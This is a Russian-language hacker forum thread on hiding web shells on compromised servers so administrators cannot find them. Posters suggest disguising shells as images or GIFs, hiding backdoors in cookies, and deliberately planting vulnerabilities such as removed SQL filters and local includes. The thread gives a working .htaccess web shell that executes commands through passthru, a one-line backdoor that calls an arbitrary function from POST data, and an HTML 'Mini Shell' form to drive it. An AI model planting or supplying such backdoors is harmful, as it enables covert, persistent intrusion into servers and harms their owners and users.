как спрятать веб шелл

такой вопрос, какие есть способы прятать шелл, чтобы админ его практически не мог найти на веб сервере?

 

Под изображение, с соответствующим расширением.

 

Как не прячь шел от грамотного админа он все равно его найдет, а вот если предусмотреть уязвимую функцию или подправить сценарий убрав в определённых местах кавычки и фильтры, то случай на восстановление сохранится!

 

по подробнее разъясни

 

убрать фильтрации в sql-запросах, поставить локальные инклуды, зарание найти лог с ошибками.

 

like this:

в родном варианте->
if( file_exists('/etc/passwd') && is_writeable('/etc/passwd')) echo 'done!';

и с поправкой на необязательность читаемости файла->
if( file_exists('/etc/passwd') || is_writeable('/etc/passwd')) echo 'done!';

В данном случае - подменя логического И на ИЛИ. Многоуважаемый Winstrool, как раз и имел ввиду подобные неявные методики.

 

Проще спрятать бекдор, да не какой нибудь, а чтобы в логах при обращений не отображался.
Да и после вставки самого бекдора, не забудьте изменить чмод и т.д.

 

Не проще. Кое-кто говорил, что все гениальное просто. Не надо никаких наворотов. Почти все бекдоры, в силу своей явной функциональности, легко палятся как визуально, так и всяческим софтом. Конечно, есть нюансы, но в большинстве случаев живут дольше именно баги, а не бэкдоры.

 

Основы сокрытия шелла на сервере

Основы сокрытия шелла на сервере

 

ммм .. пока не разу не спалили мой бекдоры в куках а насчёт уязвимости, так она останется в логах

 

можно спрятать в gif формате
можно спрятать в .htaccess

PHP:

# Override default deny rule to make .htaccess file accessible over web <Files ~ "^\.ht"> Order allow,deny Allow from all </Files>  # Make .htaccess file be interpreted as php file. This occur after apache has interpreted # the apache directoves from the .htaccess file AddType application/x-httpd-php .htaccess  ###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######  domain/path/.htaccess?c=command 

 

Как вариант можно вот это куда ни буть залепить:

PHP:

if (isset($_POST[id])) stripslashes($_POST[fun]($_POST[id]));

а вот этим вызвать:

PHP:

<? $url="http://localhost.ru/shell.php"; ?> 
<center><font color="DarkGreen">
<b>Mini Shell v 0.1!</b> 
<form action="<?=$url;?>" method = "post">
 <br> <table border=0 > <td> Message text:<br> 
<input name="fun" type="text" Value="assert">:&nbsp;
<input name="id" type="text" Value="phpinfo();">
 </td> </table> 
<input type="submit" Value="Send!"> 
</form> </center> 

P.S: Если с толком подойти к вопросу, из этого мини шела такую конфетку можно забобахать! Уверен такими конфетками уже пользуются в тесных кругах).